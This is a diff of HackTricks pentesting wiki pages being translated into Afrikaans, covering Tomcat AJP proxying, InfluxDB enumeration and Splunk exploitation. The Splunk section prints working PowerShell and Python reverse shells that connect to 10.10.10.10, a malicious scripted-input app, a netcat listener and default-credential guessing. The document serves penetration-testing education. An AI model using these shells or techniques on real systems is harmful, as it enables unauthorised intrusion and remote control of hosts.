If you're seeing this, you've successfully installed Tomcat. Congratulations!

``` - -### Nginx Dockerized-version - +### Nginx Dockerized-weergawe ```bash git clone https://github.com/ScribblerCoder/nginx-ajp-docker cd nginx-ajp-docker ``` -Replace `TARGET-IP` in `nginx.conf` witg AJP IP then build and run +Vervang `TARGET-IP` in `nginx.conf` met AJP IP, bou en voer uit. ``` bash docker build . -t nginx-ajp-proxy docker run -it --rm -p 80:80 nginx-ajp-proxy ``` - ### Apache AJP Proxy -Encountering an open port 8009 without any other accessible web ports is rare. However, it is still possible to exploit it using **Metasploit**. By leveraging **Apache** as a proxy, requests can be redirected to **Tomcat** on port 8009. - +Om 'n oop poort 8009 te vind sonder enige ander toeganklike web poorte is skaars. Dit is egter steeds moontlik om dit uit te buit deur gebruik te maak van **Metasploit**. Deur **Apache** as 'n proksi te gebruik, kan versoek na **Tomcat** op poort 8009 omgelei word. ```bash sudo apt-get install libapache2-mod-jk sudo vim /etc/apache2/apache2.conf # append the following line to the config - Include ajp.conf -sudo vim /etc/apache2/ajp.conf # create the following file, change HOST to the target address - ProxyRequests Off - - Order deny,allow - Deny from all - Allow from localhost - - ProxyPass / ajp://HOST:8009/ - ProxyPassReverse / ajp://HOST:8009/ +Include ajp.conf +sudo vim /etc/apache2/ajp.conf # create the following file, change HOST to the target address +ProxyRequests Off + +Order deny,allow +Deny from all +Allow from localhost + +ProxyPass / ajp://HOST:8009/ +ProxyPassReverse / ajp://HOST:8009/ sudo a2enmod proxy_http sudo a2enmod proxy_ajp sudo systemctl restart apache2 ``` - -This setup offers the potential to bypass intrusion detection and prevention systems (IDS/IPS) due to the **AJP protocol's binary nature**, although this capability has not been verified. By directing a regular Metasploit Tomcat exploit to `127.0.0.1:80`, you can effectively seize control of the targeted system. - +Hierdie opset bied die potensiaal om indringingsdeteksie- en voorkomingsstelsels (IDS/IPS) te omseil as gevolg van die **binêre aard van die AJP-protokol**, alhoewel hierdie vermoë nog nie geverifieer is nie. Deur 'n gewone Metasploit Tomcat-aanval na `127.0.0.1:80` te rig, kan jy effektief beheer oor die geteikende stelsel verkry. ```bash msf exploit(tomcat_mgr_deploy) > show options ``` - -## References +## Verwysings * [https://github.com/yaoweibin/nginx_ajp_module](https://github.com/yaoweibin/nginx_ajp_module) * [https://academy.hackthebox.com/module/145/section/1295](https://academy.hackthebox.com/module/145/section/1295)
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om met ervare hackers en foutjagters te kommunikeer! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Real-Time Hack Nuus**\ +Bly op hoogte van die vinnige wêreld van hacking deur middel van real-time nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste Aankondigings**\ +Bly ingelig met die nuutste foutjagbountes wat bekendgestel word en belangrike platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/network-services-pentesting/8086-pentesting-influxdb.md b/network-services-pentesting/8086-pentesting-influxdb.md index 25e5b3c44..4064f40ce 100644 --- a/network-services-pentesting/8086-pentesting-influxdb.md +++ b/network-services-pentesting/8086-pentesting-influxdb.md @@ -3,66 +3,59 @@
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Basic Information +## Basiese Inligting -**InfluxDB** is an open-source **time series database (TSDB)** developed by InfluxData. TSDBs are optimized for storing and serving time series data, which consists of timestamp-value pairs. Compared to general-purpose databases, TSDBs provide significant improvements in **storage space** and **performance** for time series datasets. They employ specialized compression algorithms and can be configured to automatically remove old data. Specialized database indices also enhance query performance. - -**Default port**: 8086 +**InfluxDB** is 'n oopbron **tydreeksdatabasis (TSDB)** wat ontwikkel is deur InfluxData. TSDB's is geoptimeer vir die stoor en bediening van tydreeksdata, wat bestaan uit tydstempel-waardepare. In vergelyking met algemene databasisse bied TSDB's aansienlike verbeterings in **stoorruimte** en **prestasie** vir tydreeksdatastelle. Hulle maak gebruik van gespesialiseerde kompressie-algoritmes en kan gekonfigureer word om outomaties ou data te verwyder. Gespesialiseerde databasisindekse verbeter ook die vraagprestasie. +**Verstekpoort**: 8086 ``` PORT STATE SERVICE VERSION 8086/tcp open http InfluxDB http admin 1.7.5 ``` +## Enumerasie -## Enumeration +Vanuit 'n pentester se oogpunt is hierdie 'n ander databasis wat sensitiewe inligting kan stoor, so dit is interessant om te weet hoe om al die inligting te dump. -From a pentester point of view this another database that could be storing sensitive information, so it's interesting to know how to dump all the info. - -### Authentication - -InfluxDB might require authentication or not +### Verifikasie +InfluxDB mag verifikasie vereis of nie. ```bash # Try unauthenticated influx -host 'host name' -port 'port #' > use _internal ``` - -If you **get an error like** this one: `ERR: unable to parse authentication credentials` it means that it's **expecting some credentials**. - +As jy 'n fout soos hierdie een kry: `ERR: nie in staat om verifikasiebewyse te ontled nie`, beteken dit dat dit **verifikasiebewyse verwag**. ``` influx –username influx –password influx_pass ``` +Daar was 'n kwesbaarheid in influxdb wat toegelaat het om die outentifikasie te omseil: [**CVE-2019-20933**](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933) -There was a vulnerability influxdb that allowed to bypass the authentication: [**CVE-2019-20933**](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933) +### Handleiding Enumerasie -### Manual Enumeration +Die inligting van hierdie voorbeeld is geneem van [**hier**](https://oznetnerd.com/2017/06/11/getting-know-influxdb/). -The information of this example was taken from [**here**](https://oznetnerd.com/2017/06/11/getting-know-influxdb/). - -#### Show databases - -The found databases are `telegraf` and `internal` (you will find this one everywhere) +#### Wys databasisse +Die gevonde databasisse is `telegraf` en `internal` (jy sal hierdie een oral vind) ```bash > show databases name: databases @@ -71,11 +64,9 @@ name telegraf _internal ``` +#### Wys tabelle/metings -#### Show tables/measurements - -The [**InfluxDB documentation**](https://docs.influxdata.com/influxdb/v1.2/introduction/getting_started/) explains that **measurements** in InfluxDB can be paralleled with SQL tables. The nomenclature of these **measurements** is indicative of their respective content, each housing data relevant to a particular entity. - +Die [**InfluxDB-dokumentasie**](https://docs.influxdata.com/influxdb/v1.2/introduction/getting_started/) verduidelik dat **metings** in InfluxDB gelykstaande is aan SQL-tabelle. Die benaming van hierdie **metings** dui op hul onderskeie inhoud, waar elkeen data bevat wat relevant is vir 'n spesifieke entiteit. ```bash > show measurements name: measurements @@ -90,11 +81,9 @@ processes swap system ``` +#### Wys kolomme/veld sleutels -#### Show columns/field keys - -The field keys are like the **columns** of the database - +Die veld sleutels is soos die **kolomme** van die databasis ```bash > show field keys name: cpu @@ -115,11 +104,9 @@ inodes_used integer [ ... more keys ...] ``` +#### Stort Tabel -#### Dump Table - -And finally you can **dump the table** doing something like - +En uiteindelik kan jy die tabel **stort** deur iets soos dit te doen ```bash select * from cpu name: cpu @@ -128,35 +115,32 @@ time cpu host usage_guest usage_guest_nice usage_idle 1497018760000000000 cpu-total ubuntu 0 0 99.297893681046 0 0 0 0 0 0.35105315947842414 0.35105315947842414 1497018760000000000 cpu1 ubuntu 0 0 99.69909729188728 0 0 0 0 0 0.20060180541622202 0.10030090270811101 ``` - {% hint style="warning" %} -In some testing with the authentication bypass it was noted that the name of the table needed to be between double quotes like: `select * from "cpu"` +In sommige toetse met die omseiling van die verifikasie is opgemerk dat die naam van die tabel tussen dubbele aanhalingstekens moet wees, soos: `select * from "cpu"` {% endhint %} -### Automated Authentication - +### Outomatiese Verifikasie ```bash msf6 > use auxiliary/scanner/http/influxdb_enum ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslag.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome** te bou en outomatiseer met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} diff --git a/network-services-pentesting/8089-splunkd.md b/network-services-pentesting/8089-splunkd.md index 5289c81d4..d6c4101dc 100644 --- a/network-services-pentesting/8089-splunkd.md +++ b/network-services-pentesting/8089-splunkd.md @@ -2,67 +2,64 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## **Basic Information** +## **Basiese Inligting** -Splunk is a **log analytics tool** that plays a crucial role in **gathering, analyzing, and visualizing data**. While its initial purpose was not to serve as a **SIEM (Security Information and Event Management)** tool, it has gained popularity in the realm of **security monitoring** and **business analytics**. - -Splunk deployments are frequently utilized to store **sensitive data** and can serve as a **valuable source of information** for potential attackers if they manage to compromise the system. -**Default port:** 8089 +Splunk is 'n **loganalitiese instrument** wat 'n kritieke rol speel in die **versameling, analise en visualisering van data**. Alhoewel sy oorspronklike doel nie was om as 'n **SIEM (Security Information and Event Management)** instrument te dien nie, het dit gewildheid verwerf in die gebied van **sekuriteitsmonitering** en **sakelike analise**. +Splunk-implementasies word dikwels gebruik om **sensitiewe data** te stoor en kan dien as 'n **waardevolle bron van inligting** vir potensiële aanvallers as hulle die stelsel kan kompromitteer. +**Verstekpoort:** 8089 ``` PORT STATE SERVICE VERSION 8089/tcp open http Splunkd httpd ``` - {% hint style="info" %} -The **Splunk web server runs by default on port 8000**. +Die **Splunk-webbediener loop standaard op poort 8000**. {% endhint %} -## Enumeration +## Opname -### Free Version +### Gratis weergawe -The Splunk Enterprise trial converts to a **free version after 60 days**, which **doesn’t require authentication**. It is not uncommon for system administrators to install a trial of Splunk to test it out, which is **subsequently forgotten about**. This will automatically convert to the free version that does not have any form of authentication, introducing a security hole in the environment. Some organizations may opt for the free version due to budget constraints, not fully understanding the implications of having no user/role management. +Die Splunk Enterprise-proef omskep na 'n **gratis weergawe na 60 dae**, wat **geen outentifikasie vereis nie**. Dit is nie ongewoon vir stelseladministrateurs om 'n proefweergawe van Splunk te installeer om dit uit te toets, wat **vervolgens vergeet word**. Dit sal outomaties omskep na die gratis weergawe wat geen vorm van outentifikasie het nie, wat 'n sekuriteitslek in die omgewing inbring. Sommige organisasies mag kies vir die gratis weergawe as gevolg van begrotingsbeperkings, sonder om ten volle te besef wat die implikasies is van geen gebruiker-/rolbestuur nie. -### Default Credentials +### Standaardlegitimasie -On older versions of Splunk, the default credentials are **`admin:changeme`**, which are conveniently displayed on the login page.\ -However, **the latest version of Splunk** sets **credentials** **during the installation process**. If the default credentials do not work, it is worth checking for common weak passwords such as `admin`, `Welcome`, `Welcome1`, `Password123`, etc. +Op ouer weergawes van Splunk is die standaardlegitimasie **`admin:changeme`**, wat gerieflik op die aanmeldingsbladsy vertoon word.\ +Die **nuutste weergawe van Splunk** stel egter **legitimasie in tydens die installasieproses**. As die standaardlegitimasie nie werk nie, is dit die moeite werd om te kyk vir algemene swak wagwoorde soos `admin`, `Welcome`, `Welcome1`, `Password123`, ens. -### Obtain Information +### Verkry inligting -Once logged in to Splunk, we can **browse data,** run **reports**, create **dashboards**, **install applications** from the Splunkbase library, and install custom applications.\ -You can also run code: Splunk has multiple ways of **running code**, such as server-side Django applications, REST endpoints, scripted inputs, and alerting scripts. A common method of gaining remote code execution on a Splunk server is through the use of a scripted input. +Sodra jy aangemeld is by Splunk, kan jy **data deursoek**, **verslae uitvoer**, **dashboard skep**, **toepassings installeer** vanaf die Splunkbase-biblioteek, en aangepaste toepassings installeer.\ +Jy kan ook kode uitvoer: Splunk het verskeie maniere om kode uit te voer, soos bedienerkant Django-toepassings, REST-eindpunte, geskrewe insette en waarskuwingsskripte. 'n Algemene metode om afstandsbeheerkode-uitvoering op 'n Splunk-bediener te verkry, is deur die gebruik van 'n geskrewe inset. -Moreover, as Splunk can be installed on Windows or Linux hosts, scripted inputs can be created to run Bash, PowerShell, or Batch scripts. +Verder kan Splunk op Windows- of Linux-gashere geïnstalleer word, en geskrewe insette kan geskep word om Bash-, PowerShell- of Batch-skripte uit te voer. ### Shodan -* `Splunk build` +* `Splunk-bou` ## RCE -### Create Custom Application +### Skep aangepaste toepassing -A custom application can run **Python, Batch, Bash, or PowerShell scripts**.\ -Note that **Splunk comes with Python installed**, so even in **Windows** systems you will be able to run python code. +'n Aangepaste toepassing kan **Python-, Batch-, Bash- of PowerShell-skripte** uitvoer.\ +Let daarop dat **Splunk met Python geïnstalleer kom**, sodat jy selfs op **Windows**-stelsels python-kode kan uitvoer. -You can use [**this**](https://github.com/0xjpuff/reverse\_shell\_splunk) Splunk package to assist us. The **`bin`** directory in this repo has examples for [Python](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/rev.py) and [PowerShell](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/run.ps1). Let's walk through this step-by-step. - -To achieve this, we first need to create a custom Splunk application using the following directory structure: +Jy kan [**hierdie**](https://github.com/0xjpuff/reverse\_shell\_splunk) Splunk-pakket gebruik om ons te help. Die **`bin`**-gids in hierdie bewaarplek het voorbeelde vir [Python](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/rev.py) en [PowerShell](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/run.ps1). Kom ons loop hierdie stap-vir-stap deur. +Om dit te bereik, moet ons eers 'n aangepaste Splunk-toepassing skep met die volgende gidsstruktuur: ```shell-session tree splunk_shell/ @@ -70,49 +67,41 @@ splunk_shell/ ├── bin └── default ``` - -The **`bin`** directory will contain any **scripts that we intend to run** (in this case, a **PowerShell** reverse shell), and the default directory will have our `inputs.conf` file. Our reverse shell will be a **PowerShell one-liner:** - +Die **`bin`** gids sal enige **skripte wat ons beoog om uit te voer** (in hierdie geval, 'n **PowerShell** omgekeerde dop) bevat, en die verstek gids sal ons `inputs.conf` lêer hê. Ons omgekeerde dop sal 'n **PowerShell een-liner** wees: ```powershell $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close( ``` - -The [inputs.conf](https://docs.splunk.com/Documentation/Splunk/latest/Admin/Inputsconf) file tells Splunk **which script to run** and any other conditions. Here we set the app as enabled and tell Splunk to run the script every 10 seconds. The interval is always in seconds, and the input (script) will only run if this setting is present. - +Die [inputs.conf](https://docs.splunk.com/Documentation/Splunk/latest/Admin/Inputsconf) lêer vertel Splunk **watter skrips om uit te voer** en enige ander voorwaardes. Hier stel ons die app as geaktiveer in en vertel Splunk om die skrips elke 10 sekondes uit te voer. Die interval is altyd in sekondes, en die inset (skrips) sal slegs uitgevoer word as hierdie instelling teenwoordig is. ```shell-session -cat inputs.conf +cat inputs.conf [script://./bin/rev.py] -disabled = 0 -interval = 10 -sourcetype = shell +disabled = 0 +interval = 10 +sourcetype = shell [script://.\bin\run.bat] disabled = 0 sourcetype = shell interval = 10 ``` +Ons benodig die `.bat` lêer wat uitgevoer sal word wanneer die toepassing geïmplementeer word en die PowerShell een-liner uitvoer. -We need the `.bat` file, which will run when the application is deployed and execute the PowerShell one-liner. - -The next step is to choose `Install app from file` and upload the application. +Die volgende stap is om `Installeer toepassing van lêer` te kies en die toepassing op te laai.
-Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat). - +Voordat ons die skadelike aangepaste toepassing oplaai, laat ons 'n luisteraar begin deur gebruik te maak van Netcat of [socat](https://linux.die.net/man/1/socat). ```shell-session sudo nc -lnvp 443 listening on [any] 443 ... ``` - -On the `Upload app` page, click on browse, choose the tarball we created earlier and click `Upload`. As **soon as we upload the application**, a **reverse shell is received** as the status of the application will automatically be switched to `Enabled`. +Op die `Upload app` bladsy, klik op `deursoek`, kies die tarball wat ons vroeër geskep het en klik op `Upload`. Sodra ons die aansoek oplaai, ontvang ons 'n omgekeerde skul as die status van die aansoek outomaties oorgeskakel word na `Enabled`. #### Linux -If we were dealing with a **Linux host**, we would need to **edit the `rev.py` Python script** before creating the tarball and uploading the custom malicious app. The rest of the process would be the same, and we would get a reverse shell connection on our Netcat listener and be off to the races. - +As ons te doen gehad het met 'n Linux-gasheer, sou ons die `rev.py` Python-skripsie moet wysig voordat ons die tarball skep en die aangepaste skadelike aansoek oplaai. Die res van die proses sou dieselfde wees, en ons sou 'n omgekeerde skulverbinding op ons Netcat luisteraar kry en aan die gang wees. ```python import sys,socket,os,pty @@ -123,29 +112,28 @@ s.connect((ip,int(port))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn('/bin/bash') ``` - ### RCE & Privilege Escalation -In the following page you can find an explanation how this service can be abused to escalate privileges and obtain persistence: +In die volgende bladsy kan jy 'n verduideliking vind oor hoe hierdie diens misbruik kan word om voorregte te verhoog en volharding te verkry: {% content-ref url="../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md" %} [splunk-lpe-and-persistence.md](../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md) {% endcontent-ref %} -## References +## Verwysings * [https://academy.hackthebox.com/module/113/section/1213](https://academy.hackthebox.com/module/113/section/1213)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md b/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md index 3f3ab5903..b2e86ac6e 100644 --- a/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md +++ b/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md @@ -2,44 +2,41 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
